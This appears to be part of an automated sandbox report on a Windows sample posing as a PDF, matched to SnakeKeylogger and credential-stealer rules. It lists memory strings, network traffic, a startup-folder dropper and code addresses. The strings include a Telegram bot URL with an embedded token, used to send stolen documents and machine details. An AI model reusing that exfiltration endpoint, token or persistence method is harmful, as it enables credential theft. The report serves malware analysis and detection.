            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: powershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000037E1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.000000000312B000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary

            barindex
            Source: 3.2.PDF-3093900299039 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.51c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 5.2.audiomaximizer.exe.333b070.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.audiomaximizer.exe.3338830.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.2a98348.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.2a9ab88.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeJump to dropped file
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_027CD3040_2_027CD304
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_04DD65B00_2_04DD65B0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_04DDC0C00_2_04DDC0C0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_04DDB3580_2_04DDB358
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_04DDFB180_2_04DDFB18
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_04DD00400_2_04DD0040
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_04DD00070_2_04DD0007
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_06CEE4590_2_06CEE459
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_06CE1C800_2_06CE1C80
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 0_2_06CE2B880_2_06CE2B88
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2C1463_2_01D2C146
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2A0883_2_01D2A088
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D253703_2_01D25370
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2D2783_2_01D2D278
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2C4683_2_01D2C468
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2C7383_2_01D2C738
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2E9883_2_01D2E988
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D269A03_2_01D269A0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2CA083_2_01D2CA08
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2CCD83_2_01D2CCD8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D26FC83_2_01D26FC8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2CFAA3_2_01D2CFAA
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D23E093_2_01D23E09
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D229EC3_2_01D229EC
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D239ED3_2_01D239ED
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D2E97A3_2_01D2E97A
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_01D23AA13_2_01D23AA1
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6A4683_2_05B6A468
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B60B303_2_05B60B30
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6AB503_2_05B6AB50
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B69D103_2_05B69D10
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6E5D03_2_05B6E5D0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6E5C03_2_05B6E5C0
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6A4623_2_05B6A462
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6E1783_2_05B6E178
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6E16B3_2_05B6E16B
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B600063_2_05B60006
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B600403_2_05B60040
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B682683_2_05B68268
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B682583_2_05B68258
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6EFBA3_2_05B6EFBA
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6EFB83_2_05B6EFB8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B60B213_2_05B60B21
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6EB603_2_05B6EB60
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6EB503_2_05B6EB50
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6F4103_2_05B6F410
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6F4013_2_05B6F401
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6D4703_2_05B6D470
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6D4633_2_05B6D463
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6DD203_2_05B6DD20
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6DD173_2_05B6DD17
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B69D003_2_05B69D00
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6D8B83_2_05B6D8B8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6D8C83_2_05B6D8C8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6F86A3_2_05B6F86A
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_05B6F8683_2_05B6F868
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_0761D1283_2_0761D128
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_076131983_2_07613198
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_0761D1183_2_0761D118
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_0761A0E83_2_0761A0E8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_0761A0F83_2_0761A0F8
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeCode function: 3_2_08A5B9083_2_08A5B908
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 5_2_0176D3045_2_0176D304
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 5_2_0176B4C85_2_0176B4C8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168C1468_2_0168C146
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeCode function: 8_2_0168A0888_2_0168A088
